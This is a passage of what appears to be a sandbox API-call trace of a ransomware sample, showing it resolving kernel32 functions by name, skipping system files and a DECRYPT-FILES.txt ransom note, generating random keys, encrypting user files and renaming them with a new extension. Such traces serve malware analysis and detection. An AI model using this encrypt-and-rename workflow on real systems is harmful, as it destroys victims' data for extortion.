returned="DeleteFileTransactedA" [0083.227] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.227] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.227] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.227] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.227] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.227] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.227] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.227] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.227] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.227] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.227] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.227] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.228] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.228] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.228] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.228] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.228] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.228] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.228] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.228] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.228] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.228] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.228] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.228] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.228] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.228] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.228] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.228] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.228] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.228] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.228] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.229] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.229] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.229] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.229] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.229] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.229] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.229] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.229] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.229] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.229] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.229] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.229] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.229] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.229] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.229] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.229] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\b8eivm.m4a") returned 85 [0083.229] wsprintfW (in: param_1=0x3f2d9ac, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\b8eivm.m4a.lNDZB") returned 91 [0083.229] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\b8eivm.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\wmoo1ftknq\\b8eivm.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\b8eivm.m4a.lNDZB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\wmoo1ftknq\\b8eivm.m4a.lndzb"), dwFlags=0x0) returned 1 [0083.230] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.230] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.230] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.231] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadcbb0a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xadcbb0a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xadcbb0a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0083.231] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0083.231] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xadcbb0a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xadcbb0a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xadcbb0a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0083.231] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0083.231] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0083.231] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0083.231] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0083.231] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0083.231] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0083.231] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0083.231] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0083.231] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0083.231] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0083.231] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0083.231] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0083.231] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0083.231] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0083.231] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0083.231] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\") returned 75 [0083.231] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0083.231] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\" [0083.231] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\jkbimi8.tmp" [0083.231] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.231] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\wmoo1ftknq\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0083.232] CloseHandle (hObject=0x0) returned 0 [0083.232] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.232] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2ef0f70, ftCreationTime.dwHighDateTime=0x1d4d56a, ftLastAccessTime.dwLowDateTime=0x2ee2cdd0, ftLastAccessTime.dwHighDateTime=0x1d4c794, ftLastWriteTime.dwLowDateTime=0x2ee2cdd0, ftLastWriteTime.dwHighDateTime=0x1d4c794, nFileSizeHigh=0x0, nFileSizeLow=0x7e60, dwReserved0=0x0, dwReserved1=0x0, cFileName="NDz9b2iJqzck3z259N.wav", cAlternateFileName="NDZ9B2~1.WAV")) returned 1 [0083.232] lstrcmpiW (lpString1="NDz9b2iJqzck3z259N.wav", lpString2="DECRYPT-FILES.txt") returned 1 [0083.232] lstrcmpiW (lpString1="NDz9b2iJqzck3z259N.wav", lpString2="autorun.inf") returned 1 [0083.232] lstrcmpiW (lpString1="NDz9b2iJqzck3z259N.wav", lpString2="boot.ini") returned 1 [0083.232] lstrcmpiW (lpString1="NDz9b2iJqzck3z259N.wav", lpString2="desktop.ini") returned 1 [0083.232] lstrcmpiW (lpString1="NDz9b2iJqzck3z259N.wav", lpString2="ntuser.dat") returned -1 [0083.232] lstrcmpiW (lpString1="NDz9b2iJqzck3z259N.wav", lpString2="iconcache.db") returned 1 [0083.232] lstrcmpiW (lpString1="NDz9b2iJqzck3z259N.wav", lpString2="bootsect.bak") returned 1 [0083.232] lstrcmpiW (lpString1="NDz9b2iJqzck3z259N.wav", lpString2="ntuser.dat.log") returned -1 [0083.232] lstrcmpiW (lpString1="NDz9b2iJqzck3z259N.wav", lpString2="thumbs.db") returned -1 [0083.232] lstrcmpiW (lpString1="NDz9b2iJqzck3z259N.wav", lpString2="Bootfont.bin") returned 1 [0083.232] lstrlenW (lpString="NDz9b2iJqzck3z259N.wav") returned 22 [0083.232] lstrcmpiW (lpString1="wav", lpString2="lnk") returned 1 [0083.232] lstrcmpiW (lpString1="wav", lpString2="exe") returned 1 [0083.232] lstrcmpiW (lpString1="wav", lpString2="sys") returned 1 [0083.232] lstrcmpiW (lpString1="wav", lpString2="dll") returned 1 [0083.232] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\") returned 75 [0083.232] lstrlenW (lpString="NDz9b2iJqzck3z259N.wav") returned 22 [0083.232] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\" [0083.232] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\", lpString2="NDz9b2iJqzck3z259N.wav" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\NDz9b2iJqzck3z259N.wav") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\NDz9b2iJqzck3z259N.wav" [0083.232] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.233] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ggFLb 9Aa\\SzbeVm7vdK3sHvH\\wMOo1ftKNq\\NDz9b2iJqzck3z259N.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ggflb 9aa\\szbevm7vdk3shvh\\wmoo1ftknq\\ndz9b2ijqzck3z259n.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0083.233] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x3f2d978 | out: lpFileSize=0x3f2d978*=32352) returned 1 [0083.233] CreateFileMappingW (hFile=0x450, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x454 [0083.233] MapViewOfFile (hFileMappingObject=0x454, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0083.233] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0083.233] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0083.233] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.233] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d8e0*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d8e0*=0x100) returned 1 [0083.234] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0083.234] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.235] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0083.235] CloseHandle (hObject=0x454) returned 1 [0083.235] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.235] WriteFile (in: hFile=0x450, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d900, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d900*=0x108, lpOverlapped=0x0) returned 1 [0083.236] CloseHandle (hObject=0x0) returned 0 [0083.236] CloseHandle (hObject=0x450) returned 1 [0083.236] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.236] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.236] GetTickCount () returned 0x114d46f [0083.237] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.237] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.237] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.237] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.237] lstrlenA (lpString="kernel32.dll") returned 12 [0083.237] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.238] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.238] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.238] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.238] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.238] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.238] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.238] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.238] lstrlenA (lpString="ADDATOMA") returned 8 [0083.238] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.238] lstrlenA (lpString="ADDATOMW") returned 8 [0083.238] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.238] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.238] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.238] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.238] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.238] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.238] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.238] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.238] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.238] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.238] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.238] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.238] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.238] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.238] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.238] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.239] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.239] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.239] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.239] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.239] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.239] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.239] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.239] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.239] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.239] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.239] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.239] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.239] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.239] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.239] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.239] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.239] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.239] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.239] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.239] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.239] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.239] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.239] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.239] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.239] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.239] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.239] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.239] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.239] 